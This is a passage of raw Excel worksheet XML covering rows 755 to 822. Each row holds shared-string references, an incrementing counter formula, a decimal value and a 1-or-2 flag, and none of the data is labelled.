        <f t="shared" si="11"/>
        <v>10374950</v>
      </c>
      <c r="D755" t="s">
        <v>1458</v>
      </c>
      <c r="E755">
        <v>25.82338714599609</v>
      </c>
      <c r="F755">
        <v>1</v>
      </c>
    </row>
    <row r="756" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A756" t="s">
        <v>1456</v>
      </c>
      <c r="B756" t="s">
        <v>1457</v>
      </c>
      <c r="C756">
        <f t="shared" si="11"/>
        <v>10376203</v>
      </c>
      <c r="D756" t="s">
        <v>1459</v>
      </c>
      <c r="E756">
        <v>4.4061532020568848</v>
      </c>
      <c r="F756">
        <v>2</v>
      </c>
    </row>
    <row r="757" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A757" t="s">
        <v>1460</v>
      </c>
      <c r="B757" t="s">
        <v>1461</v>
      </c>
      <c r="C757">
        <f t="shared" si="11"/>
        <v>10377456</v>
      </c>
      <c r="D757" t="s">
        <v>1462</v>
      </c>
      <c r="E757">
        <v>23.184125900268551</v>
      </c>
      <c r="F757">
        <v>1</v>
      </c>
    </row>
    <row r="758" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A758" t="s">
        <v>1460</v>
      </c>
      <c r="B758" t="s">
        <v>1461</v>
      </c>
      <c r="C758">
        <f t="shared" si="11"/>
        <v>10378709</v>
      </c>
      <c r="D758" t="s">
        <v>1463</v>
      </c>
      <c r="E758">
        <v>5.725982666015625</v>
      </c>
      <c r="F758">
        <v>2</v>
      </c>
    </row>
    <row r="759" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A759" t="s">
        <v>1464</v>
      </c>
      <c r="B759" t="s">
        <v>1465</v>
      </c>
      <c r="C759">
        <f t="shared" si="11"/>
        <v>10379962</v>
      </c>
      <c r="D759" t="s">
        <v>1466</v>
      </c>
      <c r="E759">
        <v>32.559745788574219</v>
      </c>
      <c r="F759">
        <v>1</v>
      </c>
    </row>
    <row r="760" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A760" t="s">
        <v>1464</v>
      </c>
      <c r="B760" t="s">
        <v>1465</v>
      </c>
      <c r="C760">
        <f t="shared" si="11"/>
        <v>10381215</v>
      </c>
      <c r="D760" t="s">
        <v>1467</v>
      </c>
      <c r="E760">
        <v>2.2967713885009289E-3</v>
      </c>
      <c r="F760">
        <v>2</v>
      </c>
    </row>
    <row r="761" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A761" t="s">
        <v>1468</v>
      </c>
      <c r="B761" t="s">
        <v>1469</v>
      </c>
      <c r="C761">
        <f t="shared" si="11"/>
        <v>10382468</v>
      </c>
      <c r="D761" t="s">
        <v>1470</v>
      </c>
      <c r="E761">
        <v>28.486923217773441</v>
      </c>
      <c r="F761">
        <v>1</v>
      </c>
    </row>
    <row r="762" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A762" t="s">
        <v>1468</v>
      </c>
      <c r="B762" t="s">
        <v>1469</v>
      </c>
      <c r="C762">
        <f t="shared" si="11"/>
        <v>10383721</v>
      </c>
      <c r="D762" t="s">
        <v>1471</v>
      </c>
      <c r="E762">
        <v>2.384673118591309</v>
      </c>
      <c r="F762">
        <v>2</v>
      </c>
    </row>
    <row r="763" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A763" t="s">
        <v>1472</v>
      </c>
      <c r="B763" t="s">
        <v>1473</v>
      </c>
      <c r="C763">
        <f t="shared" si="11"/>
        <v>10384974</v>
      </c>
      <c r="D763" t="s">
        <v>1474</v>
      </c>
      <c r="E763">
        <v>33.283649444580078</v>
      </c>
      <c r="F763">
        <v>1</v>
      </c>
    </row>
    <row r="764" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A764" t="s">
        <v>1472</v>
      </c>
      <c r="B764" t="s">
        <v>1473</v>
      </c>
      <c r="C764">
        <f t="shared" si="11"/>
        <v>10386227</v>
      </c>
      <c r="D764" t="s">
        <v>1475</v>
      </c>
      <c r="E764">
        <v>5.7903709411621094</v>
      </c>
      <c r="F764">
        <v>2</v>
      </c>
    </row>
    <row r="765" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A765" t="s">
        <v>1476</v>
      </c>
      <c r="B765" t="s">
        <v>1477</v>
      </c>
      <c r="C765">
        <f t="shared" si="11"/>
        <v>10387480</v>
      </c>
      <c r="D765" t="s">
        <v>1478</v>
      </c>
      <c r="E765">
        <v>26.115242004394531</v>
      </c>
      <c r="F765">
        <v>1</v>
      </c>
    </row>
    <row r="766" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A766" t="s">
        <v>1476</v>
      </c>
      <c r="B766" t="s">
        <v>1477</v>
      </c>
      <c r="C766">
        <f t="shared" si="11"/>
        <v>10388733</v>
      </c>
      <c r="D766" t="s">
        <v>1479</v>
      </c>
      <c r="E766">
        <v>2.3312149047851558</v>
      </c>
      <c r="F766">
        <v>2</v>
      </c>
    </row>
    <row r="767" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A767" t="s">
        <v>1480</v>
      </c>
      <c r="B767" t="s">
        <v>1481</v>
      </c>
      <c r="C767">
        <f t="shared" si="11"/>
        <v>10389986</v>
      </c>
      <c r="D767" t="s">
        <v>1482</v>
      </c>
      <c r="E767">
        <v>30.602729797363281</v>
      </c>
      <c r="F767">
        <v>1</v>
      </c>
    </row>
    <row r="768" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A768" t="s">
        <v>1480</v>
      </c>
      <c r="B768" t="s">
        <v>1481</v>
      </c>
      <c r="C768">
        <f t="shared" si="11"/>
        <v>10391239</v>
      </c>
      <c r="D768" t="s">
        <v>1483</v>
      </c>
      <c r="E768">
        <v>3.541046142578125</v>
      </c>
      <c r="F768">
        <v>2</v>
      </c>
    </row>
    <row r="769" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A769" t="s">
        <v>1484</v>
      </c>
      <c r="B769" t="s">
        <v>1485</v>
      </c>
      <c r="C769">
        <f t="shared" si="11"/>
        <v>10392492</v>
      </c>
      <c r="D769" t="s">
        <v>1486</v>
      </c>
      <c r="E769">
        <v>24.073612213134769</v>
      </c>
      <c r="F769">
        <v>1</v>
      </c>
    </row>
    <row r="770" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A770" t="s">
        <v>1484</v>
      </c>
      <c r="B770" t="s">
        <v>1485</v>
      </c>
      <c r="C770">
        <f t="shared" si="11"/>
        <v>10393745</v>
      </c>
      <c r="D770" t="s">
        <v>1487</v>
      </c>
      <c r="E770">
        <v>4.0908579831011588E-4</v>
      </c>
      <c r="F770">
        <v>2</v>
      </c>
    </row>
    <row r="771" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A771" t="s">
        <v>1488</v>
      </c>
      <c r="B771" t="s">
        <v>1489</v>
      </c>
      <c r="C771">
        <f t="shared" si="11"/>
        <v>10394998</v>
      </c>
      <c r="D771" t="s">
        <v>1490</v>
      </c>
      <c r="E771">
        <v>29.812751770019531</v>
      </c>
      <c r="F771">
        <v>1</v>
      </c>
    </row>
    <row r="772" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A772" t="s">
        <v>1488</v>
      </c>
      <c r="B772" t="s">
        <v>1489</v>
      </c>
      <c r="C772">
        <f t="shared" si="11"/>
        <v>10396251</v>
      </c>
      <c r="D772" t="s">
        <v>1491</v>
      </c>
      <c r="E772">
        <v>8.2735223770141602</v>
      </c>
      <c r="F772">
        <v>2</v>
      </c>
    </row>
    <row r="773" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A773" t="s">
        <v>1492</v>
      </c>
      <c r="B773" t="s">
        <v>1493</v>
      </c>
      <c r="C773">
        <f t="shared" si="11"/>
        <v>10397504</v>
      </c>
      <c r="D773" t="s">
        <v>1494</v>
      </c>
      <c r="E773">
        <v>25.09431076049805</v>
      </c>
      <c r="F773">
        <v>1</v>
      </c>
    </row>
    <row r="774" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A774" t="s">
        <v>1492</v>
      </c>
      <c r="B774" t="s">
        <v>1493</v>
      </c>
      <c r="C774">
        <f t="shared" si="11"/>
        <v>10398757</v>
      </c>
      <c r="D774" t="s">
        <v>1495</v>
      </c>
      <c r="E774">
        <v>7.9506082534790039</v>
      </c>
      <c r="F774">
        <v>2</v>
      </c>
    </row>
    <row r="775" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A775" t="s">
        <v>1496</v>
      </c>
      <c r="B775" t="s">
        <v>1497</v>
      </c>
      <c r="C775">
        <f t="shared" si="11"/>
        <v>10400010</v>
      </c>
      <c r="D775" t="s">
        <v>1498</v>
      </c>
      <c r="E775">
        <v>27.694240570068359</v>
      </c>
      <c r="F775">
        <v>1</v>
      </c>
    </row>
    <row r="776" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A776" t="s">
        <v>1496</v>
      </c>
      <c r="B776" t="s">
        <v>1497</v>
      </c>
      <c r="C776">
        <f t="shared" si="11"/>
        <v>10401263</v>
      </c>
      <c r="D776" t="s">
        <v>1499</v>
      </c>
      <c r="E776">
        <v>7.1545195579528809</v>
      </c>
      <c r="F776">
        <v>2</v>
      </c>
    </row>
    <row r="777" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A777" t="s">
        <v>1500</v>
      </c>
      <c r="B777" t="s">
        <v>1501</v>
      </c>
      <c r="C777">
        <f t="shared" si="11"/>
        <v>10402516</v>
      </c>
      <c r="D777" t="s">
        <v>1502</v>
      </c>
      <c r="E777">
        <v>32.854503631591797</v>
      </c>
      <c r="F777">
        <v>1</v>
      </c>
    </row>
    <row r="778" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A778" t="s">
        <v>1500</v>
      </c>
      <c r="B778" t="s">
        <v>1501</v>
      </c>
      <c r="C778">
        <f t="shared" ref="C778:C841" si="12">C777+1253</f>
        <v>10403769</v>
      </c>
      <c r="D778" t="s">
        <v>1503</v>
      </c>
      <c r="E778">
        <v>1.2636774778366091</v>
      </c>
      <c r="F778">
        <v>2</v>
      </c>
    </row>
    <row r="779" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A779" t="s">
        <v>1504</v>
      </c>
      <c r="B779" t="s">
        <v>1505</v>
      </c>
      <c r="C779">
        <f t="shared" si="12"/>
        <v>10405022</v>
      </c>
      <c r="D779" t="s">
        <v>1506</v>
      </c>
      <c r="E779">
        <v>27.787837982177731</v>
      </c>
      <c r="F779">
        <v>1</v>
      </c>
    </row>
    <row r="780" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A780" t="s">
        <v>1504</v>
      </c>
      <c r="B780" t="s">
        <v>1505</v>
      </c>
      <c r="C780">
        <f t="shared" si="12"/>
        <v>10406275</v>
      </c>
      <c r="D780" t="s">
        <v>1507</v>
      </c>
      <c r="E780">
        <v>0.14325742423534391</v>
      </c>
      <c r="F780">
        <v>2</v>
      </c>
    </row>
    <row r="781" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A781" t="s">
        <v>1508</v>
      </c>
      <c r="B781" t="s">
        <v>1509</v>
      </c>
      <c r="C781">
        <f t="shared" si="12"/>
        <v>10407528</v>
      </c>
      <c r="D781" t="s">
        <v>1510</v>
      </c>
      <c r="E781">
        <v>21.54762077331543</v>
      </c>
      <c r="F781">
        <v>1</v>
      </c>
    </row>
    <row r="782" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A782" t="s">
        <v>1508</v>
      </c>
      <c r="B782" t="s">
        <v>1509</v>
      </c>
      <c r="C782">
        <f t="shared" si="12"/>
        <v>10408781</v>
      </c>
      <c r="D782" t="s">
        <v>1511</v>
      </c>
      <c r="E782">
        <v>1.0332798585295681E-2</v>
      </c>
      <c r="F782">
        <v>2</v>
      </c>
    </row>
    <row r="783" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A783" t="s">
        <v>1512</v>
      </c>
      <c r="B783" t="s">
        <v>1513</v>
      </c>
      <c r="C783">
        <f t="shared" si="12"/>
        <v>10410034</v>
      </c>
      <c r="D783" t="s">
        <v>1378</v>
      </c>
      <c r="E783">
        <v>26.800601959228519</v>
      </c>
      <c r="F783">
        <v>1</v>
      </c>
    </row>
    <row r="784" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A784" t="s">
        <v>1512</v>
      </c>
      <c r="B784" t="s">
        <v>1513</v>
      </c>
      <c r="C784">
        <f t="shared" si="12"/>
        <v>10411287</v>
      </c>
      <c r="D784" t="s">
        <v>1514</v>
      </c>
      <c r="E784">
        <v>8.7229347229003906</v>
      </c>
      <c r="F784">
        <v>2</v>
      </c>
    </row>
    <row r="785" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A785" t="s">
        <v>1515</v>
      </c>
      <c r="B785" t="s">
        <v>1516</v>
      </c>
      <c r="C785">
        <f t="shared" si="12"/>
        <v>10412540</v>
      </c>
      <c r="D785" t="s">
        <v>1517</v>
      </c>
      <c r="E785">
        <v>21.285306930541989</v>
      </c>
      <c r="F785">
        <v>1</v>
      </c>
    </row>
    <row r="786" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A786" t="s">
        <v>1515</v>
      </c>
      <c r="B786" t="s">
        <v>1516</v>
      </c>
      <c r="C786">
        <f t="shared" si="12"/>
        <v>10413793</v>
      </c>
      <c r="D786" t="s">
        <v>1518</v>
      </c>
      <c r="E786">
        <v>11.06460475921631</v>
      </c>
      <c r="F786">
        <v>2</v>
      </c>
    </row>
    <row r="787" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A787" t="s">
        <v>1519</v>
      </c>
      <c r="B787" t="s">
        <v>1520</v>
      </c>
      <c r="C787">
        <f t="shared" si="12"/>
        <v>10415046</v>
      </c>
      <c r="D787" t="s">
        <v>1521</v>
      </c>
      <c r="E787">
        <v>15.816292762756349</v>
      </c>
      <c r="F787">
        <v>1</v>
      </c>
    </row>
    <row r="788" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A788" t="s">
        <v>1519</v>
      </c>
      <c r="B788" t="s">
        <v>1520</v>
      </c>
      <c r="C788">
        <f t="shared" si="12"/>
        <v>10416299</v>
      </c>
      <c r="D788" t="s">
        <v>1522</v>
      </c>
      <c r="E788">
        <v>8.2063102722167969</v>
      </c>
      <c r="F788">
        <v>2</v>
      </c>
    </row>
    <row r="789" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A789" t="s">
        <v>1523</v>
      </c>
      <c r="B789" t="s">
        <v>1524</v>
      </c>
      <c r="C789">
        <f t="shared" si="12"/>
        <v>10417552</v>
      </c>
      <c r="D789" t="s">
        <v>1525</v>
      </c>
      <c r="E789">
        <v>31.033027648925781</v>
      </c>
      <c r="F789">
        <v>1</v>
      </c>
    </row>
    <row r="790" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A790" t="s">
        <v>1523</v>
      </c>
      <c r="B790" t="s">
        <v>1524</v>
      </c>
      <c r="C790">
        <f t="shared" si="12"/>
        <v>10418805</v>
      </c>
      <c r="D790" t="s">
        <v>1526</v>
      </c>
      <c r="E790">
        <v>3.6178638935089111</v>
      </c>
      <c r="F790">
        <v>2</v>
      </c>
    </row>
    <row r="791" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A791" t="s">
        <v>1527</v>
      </c>
      <c r="B791" t="s">
        <v>1528</v>
      </c>
      <c r="C791">
        <f t="shared" si="12"/>
        <v>10420058</v>
      </c>
      <c r="D791" t="s">
        <v>1529</v>
      </c>
      <c r="E791">
        <v>22.01241493225098</v>
      </c>
      <c r="F791">
        <v>1</v>
      </c>
    </row>
    <row r="792" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A792" t="s">
        <v>1527</v>
      </c>
      <c r="B792" t="s">
        <v>1528</v>
      </c>
      <c r="C792">
        <f t="shared" si="12"/>
        <v>10421311</v>
      </c>
      <c r="D792" t="s">
        <v>1530</v>
      </c>
      <c r="E792">
        <v>5.8203568458557129</v>
      </c>
      <c r="F792">
        <v>2</v>
      </c>
    </row>
    <row r="793" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A793" t="s">
        <v>1531</v>
      </c>
      <c r="B793" t="s">
        <v>1532</v>
      </c>
      <c r="C793">
        <f t="shared" si="12"/>
        <v>10422564</v>
      </c>
      <c r="D793" t="s">
        <v>1533</v>
      </c>
      <c r="E793">
        <v>35.401557922363281</v>
      </c>
      <c r="F793">
        <v>1</v>
      </c>
    </row>
    <row r="794" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A794" t="s">
        <v>1531</v>
      </c>
      <c r="B794" t="s">
        <v>1532</v>
      </c>
      <c r="C794">
        <f t="shared" si="12"/>
        <v>10423817</v>
      </c>
      <c r="D794" t="s">
        <v>1534</v>
      </c>
      <c r="E794">
        <v>7.3862648010253906</v>
      </c>
      <c r="F794">
        <v>2</v>
      </c>
    </row>
    <row r="795" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A795" t="s">
        <v>1535</v>
      </c>
      <c r="B795" t="s">
        <v>1536</v>
      </c>
      <c r="C795">
        <f t="shared" si="12"/>
        <v>10425070</v>
      </c>
      <c r="D795" t="s">
        <v>1537</v>
      </c>
      <c r="E795">
        <v>27.742389678955082</v>
      </c>
      <c r="F795">
        <v>1</v>
      </c>
    </row>
    <row r="796" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A796" t="s">
        <v>1535</v>
      </c>
      <c r="B796" t="s">
        <v>1536</v>
      </c>
      <c r="C796">
        <f t="shared" si="12"/>
        <v>10426323</v>
      </c>
      <c r="D796" t="s">
        <v>1538</v>
      </c>
      <c r="E796">
        <v>3.6034774780273442</v>
      </c>
      <c r="F796">
        <v>2</v>
      </c>
    </row>
    <row r="797" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A797" t="s">
        <v>1539</v>
      </c>
      <c r="B797" t="s">
        <v>1540</v>
      </c>
      <c r="C797">
        <f t="shared" si="12"/>
        <v>10427576</v>
      </c>
      <c r="D797" t="s">
        <v>1541</v>
      </c>
      <c r="E797">
        <v>21.599185943603519</v>
      </c>
      <c r="F797">
        <v>1</v>
      </c>
    </row>
    <row r="798" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A798" t="s">
        <v>1539</v>
      </c>
      <c r="B798" t="s">
        <v>1540</v>
      </c>
      <c r="C798">
        <f t="shared" si="12"/>
        <v>10428829</v>
      </c>
      <c r="D798" t="s">
        <v>1542</v>
      </c>
      <c r="E798">
        <v>7.0908303260803223</v>
      </c>
      <c r="F798">
        <v>2</v>
      </c>
    </row>
    <row r="799" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A799" t="s">
        <v>1543</v>
      </c>
      <c r="B799" t="s">
        <v>1544</v>
      </c>
      <c r="C799">
        <f t="shared" si="12"/>
        <v>10430082</v>
      </c>
      <c r="D799" t="s">
        <v>1545</v>
      </c>
      <c r="E799">
        <v>20.02713584899902</v>
      </c>
      <c r="F799">
        <v>1</v>
      </c>
    </row>
    <row r="800" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A800" t="s">
        <v>1543</v>
      </c>
      <c r="B800" t="s">
        <v>1544</v>
      </c>
      <c r="C800">
        <f t="shared" si="12"/>
        <v>10431335</v>
      </c>
      <c r="D800" t="s">
        <v>1546</v>
      </c>
      <c r="E800">
        <v>11.322859764099119</v>
      </c>
      <c r="F800">
        <v>2</v>
      </c>
    </row>
    <row r="801" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A801" t="s">
        <v>1547</v>
      </c>
      <c r="B801" t="s">
        <v>1548</v>
      </c>
      <c r="C801">
        <f t="shared" si="12"/>
        <v>10432588</v>
      </c>
      <c r="D801" t="s">
        <v>1549</v>
      </c>
      <c r="E801">
        <v>28.118085861206051</v>
      </c>
      <c r="F801">
        <v>1</v>
      </c>
    </row>
    <row r="802" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A802" t="s">
        <v>1547</v>
      </c>
      <c r="B802" t="s">
        <v>1548</v>
      </c>
      <c r="C802">
        <f t="shared" si="12"/>
        <v>10433841</v>
      </c>
      <c r="D802" t="s">
        <v>1550</v>
      </c>
      <c r="E802">
        <v>15.28445339202881</v>
      </c>
      <c r="F802">
        <v>2</v>
      </c>
    </row>
    <row r="803" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A803" t="s">
        <v>1551</v>
      </c>
      <c r="B803" t="s">
        <v>1552</v>
      </c>
      <c r="C803">
        <f t="shared" si="12"/>
        <v>10435094</v>
      </c>
      <c r="D803" t="s">
        <v>1553</v>
      </c>
      <c r="E803">
        <v>25.934574127197269</v>
      </c>
      <c r="F803">
        <v>1</v>
      </c>
    </row>
    <row r="804" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A804" t="s">
        <v>1551</v>
      </c>
      <c r="B804" t="s">
        <v>1552</v>
      </c>
      <c r="C804">
        <f t="shared" si="12"/>
        <v>10436347</v>
      </c>
      <c r="D804" t="s">
        <v>1554</v>
      </c>
      <c r="E804">
        <v>17.645124435424801</v>
      </c>
      <c r="F804">
        <v>2</v>
      </c>
    </row>
    <row r="805" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A805" t="s">
        <v>1555</v>
      </c>
      <c r="B805" t="s">
        <v>1556</v>
      </c>
      <c r="C805">
        <f t="shared" si="12"/>
        <v>10437600</v>
      </c>
      <c r="D805" t="s">
        <v>1557</v>
      </c>
      <c r="E805">
        <v>26.33225059509277</v>
      </c>
      <c r="F805">
        <v>1</v>
      </c>
    </row>
    <row r="806" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A806" t="s">
        <v>1555</v>
      </c>
      <c r="B806" t="s">
        <v>1556</v>
      </c>
      <c r="C806">
        <f t="shared" si="12"/>
        <v>10438853</v>
      </c>
      <c r="D806" t="s">
        <v>1558</v>
      </c>
      <c r="E806">
        <v>16.102354049682621</v>
      </c>
      <c r="F806">
        <v>2</v>
      </c>
    </row>
    <row r="807" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A807" t="s">
        <v>1559</v>
      </c>
      <c r="B807" t="s">
        <v>1560</v>
      </c>
      <c r="C807">
        <f t="shared" si="12"/>
        <v>10440106</v>
      </c>
      <c r="D807" t="s">
        <v>1561</v>
      </c>
      <c r="E807">
        <v>20.83101844787598</v>
      </c>
      <c r="F807">
        <v>1</v>
      </c>
    </row>
    <row r="808" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A808" t="s">
        <v>1559</v>
      </c>
      <c r="B808" t="s">
        <v>1560</v>
      </c>
      <c r="C808">
        <f t="shared" si="12"/>
        <v>10441359</v>
      </c>
      <c r="D808" t="s">
        <v>1562</v>
      </c>
      <c r="E808">
        <v>6.2090339660644531</v>
      </c>
      <c r="F808">
        <v>2</v>
      </c>
    </row>
    <row r="809" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A809" t="s">
        <v>1563</v>
      </c>
      <c r="B809" t="s">
        <v>1564</v>
      </c>
      <c r="C809">
        <f t="shared" si="12"/>
        <v>10442612</v>
      </c>
      <c r="D809" t="s">
        <v>1565</v>
      </c>
      <c r="E809">
        <v>26.99040412902832</v>
      </c>
      <c r="F809">
        <v>1</v>
      </c>
    </row>
    <row r="810" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A810" t="s">
        <v>1563</v>
      </c>
      <c r="B810" t="s">
        <v>1564</v>
      </c>
      <c r="C810">
        <f t="shared" si="12"/>
        <v>10443865</v>
      </c>
      <c r="D810" t="s">
        <v>1566</v>
      </c>
      <c r="E810">
        <v>13.95009803771973</v>
      </c>
      <c r="F810">
        <v>2</v>
      </c>
    </row>
    <row r="811" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A811" t="s">
        <v>1567</v>
      </c>
      <c r="B811" t="s">
        <v>1568</v>
      </c>
      <c r="C811">
        <f t="shared" si="12"/>
        <v>10445118</v>
      </c>
      <c r="D811" t="s">
        <v>1569</v>
      </c>
      <c r="E811">
        <v>26.5964241027832</v>
      </c>
      <c r="F811">
        <v>1</v>
      </c>
    </row>
    <row r="812" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A812" t="s">
        <v>1567</v>
      </c>
      <c r="B812" t="s">
        <v>1568</v>
      </c>
      <c r="C812">
        <f t="shared" si="12"/>
        <v>10446371</v>
      </c>
      <c r="D812" t="s">
        <v>1570</v>
      </c>
      <c r="E812">
        <v>12.25641345977783</v>
      </c>
      <c r="F812">
        <v>2</v>
      </c>
    </row>
    <row r="813" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A813" t="s">
        <v>1571</v>
      </c>
      <c r="B813" t="s">
        <v>1572</v>
      </c>
      <c r="C813">
        <f t="shared" si="12"/>
        <v>10447624</v>
      </c>
      <c r="D813" t="s">
        <v>1573</v>
      </c>
      <c r="E813">
        <v>30.061565399169918</v>
      </c>
      <c r="F813">
        <v>1</v>
      </c>
    </row>
    <row r="814" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A814" t="s">
        <v>1571</v>
      </c>
      <c r="B814" t="s">
        <v>1572</v>
      </c>
      <c r="C814">
        <f t="shared" si="12"/>
        <v>10448877</v>
      </c>
      <c r="D814" t="s">
        <v>1574</v>
      </c>
      <c r="E814">
        <v>0.34075862169265753</v>
      </c>
      <c r="F814">
        <v>2</v>
      </c>
    </row>
    <row r="815" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A815" t="s">
        <v>1575</v>
      </c>
      <c r="B815" t="s">
        <v>1576</v>
      </c>
      <c r="C815">
        <f t="shared" si="12"/>
        <v>10450130</v>
      </c>
      <c r="D815" t="s">
        <v>1577</v>
      </c>
      <c r="E815">
        <v>20.43558502197266</v>
      </c>
      <c r="F815">
        <v>1</v>
      </c>
    </row>
    <row r="816" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A816" t="s">
        <v>1575</v>
      </c>
      <c r="B816" t="s">
        <v>1576</v>
      </c>
      <c r="C816">
        <f t="shared" si="12"/>
        <v>10451383</v>
      </c>
      <c r="D816" t="s">
        <v>1578</v>
      </c>
      <c r="E816">
        <v>16.136690139770511</v>
      </c>
      <c r="F816">
        <v>2</v>
      </c>
    </row>
    <row r="817" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A817" t="s">
        <v>1579</v>
      </c>
      <c r="B817" t="s">
        <v>1580</v>
      </c>
      <c r="C817">
        <f t="shared" si="12"/>
        <v>10452636</v>
      </c>
      <c r="D817" t="s">
        <v>1581</v>
      </c>
      <c r="E817">
        <v>20.878286361694339</v>
      </c>
      <c r="F817">
        <v>1</v>
      </c>
    </row>
    <row r="818" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A818" t="s">
        <v>1579</v>
      </c>
      <c r="B818" t="s">
        <v>1580</v>
      </c>
      <c r="C818">
        <f t="shared" si="12"/>
        <v>10453889</v>
      </c>
      <c r="D818" t="s">
        <v>1582</v>
      </c>
      <c r="E818">
        <v>6.3792629241943359</v>
      </c>
      <c r="F818">
        <v>2</v>
      </c>
    </row>
    <row r="819" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A819" t="s">
        <v>1583</v>
      </c>
      <c r="B819" t="s">
        <v>1584</v>
      </c>
      <c r="C819">
        <f t="shared" si="12"/>
        <v>10455142</v>
      </c>
      <c r="D819" t="s">
        <v>1585</v>
      </c>
      <c r="E819">
        <v>28.530271530151371</v>
      </c>
      <c r="F819">
        <v>1</v>
      </c>
    </row>
    <row r="820" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A820" t="s">
        <v>1583</v>
      </c>
      <c r="B820" t="s">
        <v>1584</v>
      </c>
      <c r="C820">
        <f t="shared" si="12"/>
        <v>10456395</v>
      </c>
      <c r="D820" t="s">
        <v>1586</v>
      </c>
      <c r="E820">
        <v>3.224840641021729</v>
      </c>
      <c r="F820">
        <v>2</v>
      </c>
    </row>
    <row r="821" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A821" t="s">
        <v>1587</v>
      </c>
      <c r="B821" t="s">
        <v>1588</v>
      </c>
      <c r="C821">
        <f t="shared" si="12"/>
        <v>10457648</v>
      </c>
      <c r="D821" t="s">
        <v>1589</v>
      </c>
      <c r="E821">
        <v>21.945291519165039</v>
      </c>
      <c r="F821">
        <v>1</v>
      </c>
    </row>
    <row r="822" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A822" t="s">
        <v>1587</v>
      </c>
      <c r="B822" t="s">
        <v>1588</v>
      </c>
      <c r="C822">
